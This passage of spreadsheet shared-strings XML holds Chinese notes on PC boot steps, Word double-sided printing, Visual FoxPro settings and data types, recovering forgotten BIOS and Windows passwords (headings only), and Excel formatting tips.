      </rPr>
      <t>BIOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将读取并执行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硬盘上的主引导记录</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，主引导记录接着从分区表中找到第一个活动分区，然后读取并执行这个</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活动分区的分区引导记录</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>而分区引导记录将负责读取并执行</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IO.SYS</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>这是</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>最基本的系统文件。</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>IO.SYS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>首先要初始化一些重要的系统数据，然后就显示出我们熟悉的蓝天白云，在这幅画面之下，</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>Windows</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>将继续进行</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>DOS</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部分和</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color rgb="FFFF0000"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>GUI</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>图形用户界面</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="Calibri"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="10.5"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部分的引导和初始化工作，一切顺利结束，电脑正常启动。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <b/>
        <u/>
        <sz val="12"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、安装主板（下图）　　</t>
    </r>
  </si>
  <si>
    <t>  告诉大家一个无敌删除命令，任意无法删除的文件都能删除</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>  在实际工作中，word文档的双面打印是节约纸张的好办法，网上对这方面的介绍也很多，不过说的很杂乱。能否双面打印取决于打印机的功能。如果打印机本身具有双面打印功能，在文件——打印——属性（首选项）中即可设置。若没有双面打印功能，可设置文件——打印——手动双面打印，这样设置后，电脑后自动先打印奇数页，然后手动把纸重新放入纸盒，电脑自动再打印偶数页；不过这样也太浪费体力了。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>  这样通过两次打印命令就可以实现双面打印,一气呵成，免去了复杂手工劳动。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>  </t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FFFF0000"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>不过要提醒一下，</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <color rgb="FF323E32"/>
        <rFont val="Simsun"/>
        <charset val="134"/>
      </rPr>
      <t>很多使用时间比较久的打印机都无法完全避免一次进多张纸的问题，如果在双面打印时一但进多张纸，则后面打印的所有纸张就会因错页而报废。因此，建议大家在进行双面打印时最好守在打印机旁，一旦发生这种情况马上采取措施。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.在word窗口中，“文件”、“打印”，出现“打印”对话框，“打印范围”选取“奇数页”（office图标---打印-打印（项）---下拉箭头中选择；），“确定”后，开始打印，打印出来的全部是文档奇数页（如下图）。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 主程序设计</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>set talk off                           </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>set esca off                            </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">set exact off                            </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">set excl Off *设定表为共享方式            </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">SET REPROCESS TO AUTOMATIC *设定数据加锁  </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 VFP主程序的一般写法</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VF数据的类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VF数据的类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">    </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>数据类型是数据的基本属性。对数据进行操作的时候，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color rgb="FFFF0000"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>只有同类型的数据才能进行操作</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>，若对不同类型的数据进行操作，将被系统判为语法出错。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>小数位数超过</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位时，系统将进行四舍五入的处理。每个货币型数据占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日期型数据取值的范围是：公元</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>0001</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>月</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>1</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日一公元</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>9999</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>年</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>12</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>月</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>31</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (4)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日期时间型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(DateTime)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：用以保存日期和时间值。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>日期时间型数据的存储格式为</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> “yyyymmddhhmmss”</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>其中</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>yyyy</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为年，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>4</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>mm</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为月，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>dd</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为日，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>hh</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为时间中的小时，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>mm</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为时间中的分钟，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位，</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>ss</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>为时间中的秒，占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>2</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve"> (7)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>双精度型</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(Double)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>：用于取代数值型，以便能提供更高的数值精度。
双精度型只能用于数据表中字段的定义，它采用固定存储长度的浮点数形式。与数值型不同，双精度型数据的小数点的位置是由输入的数据值来决定的。每个双精度型数据占</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>8</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>个字节。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>在</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>VFP</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>中，表单的属性就是表单的结构特征。通过修改表单的属性可以改变表单的内常用的表单属性如表</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>1—8</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>所示。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>属性名</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t>作用</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="2"/>
        <charset val="134"/>
        <scheme val="minor"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">AutoCenter   </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于控制表单初始化时是否总是位于</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>VFP</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>窗口或其父表单的中央</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">BackColor    </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于确定表单的背景颜色</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">BorderStyle  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于控制表单是否有边框：系统</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>(</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>可调</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>)</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>、单线、双线</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Caption       </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>表单的标题</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Closable      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于控制表单的标题栏中的关闭按钮是否能用</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">ControlBox  </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于控制表单的标题栏中是否有控制按钮</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">MaxButton   </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于控制表单的标题栏中是否有极大化按钮</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">Movable     </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于控制表单是否可移动</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t xml:space="preserve">TitleBar      </t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>用于控制表单是否有标题栏</t>
    </r>
    <r>
      <rPr>
        <sz val="11"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>一、遗忘了SYSTEM密码(开机密码)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>遗忘了该密码，就不能进行CMOS设置了。如果你能使用计算机，但不能进入CMOS设置，可以这样解决:在DOS状态下启动DEBUG，然后输入如下命令手工清除SETUP密码:</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>二、遗忘了SETUP密码（遗忘了该密码，就不能进行CMOS设置了）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>三、遗忘了Windows登录密码（帐号）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Windows的电源管理功能也可以设置密码，启用此功能后，当系统从节能状态返回时就会要求输入密码。</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>四、遗忘了Windows屏保密码</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>五、遗忘了Windows电源管理密码（Windows的电源管理功能可设置密码，启用此功能后，当系统从节能状态返回时就会要求输入密码）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>三、启动篇</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t xml:space="preserve">  shutdown.exe -a　　　　　　　　 取消关机</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自定义数字格式：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>选择单元格区域---开始（选项卡）---数字（栏）对话框的下拉箭头---自定义---输入：[红色]0.00"pcs";即可在选定的区域输入数字时，全部是红色字体，保留两位小数，都会在后面加入pcs；（还可选蓝色）</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据有效性：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>数据（选项卡）---数据工具（栏）：数据有效性：有四个选项卡：a 设置：有效性条件；b 输入信息；c 出错警告；d 输入法模式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>窗口拆分：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视图（选项卡）---窗口（栏）---拆分；光标停在诸如：19行（A19）、D列（d1）、D19,具有不同的拆分方式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>用中文大写数字显示：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>开始（选项卡）---数字（栏）---分类：特殊；类型：中文大写数字；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分页符操作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>excel 2007默认有16384列，xfd列;1048576行;26+26*26+23*26*26+5*26+4</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <r>
      <t>“</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>分页预览</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF333333"/>
        <rFont val="Verdana"/>
        <family val="2"/>
      </rPr>
      <t>”</t>
    </r>
    <r>
      <rPr>
        <sz val="8"/>
        <color rgb="FF333333"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>视图对于查看您做出的其他更改（如页面方向和格式更改）对自动分页的影响特别有用。例如，更改行高和列宽会影响自动分页符的位置。还可以对受当前打印机驱动程序的页边距设置影响的分页符进行更改。</t>
    </r>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>要同时禁用多个超链接，执行下列操作：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
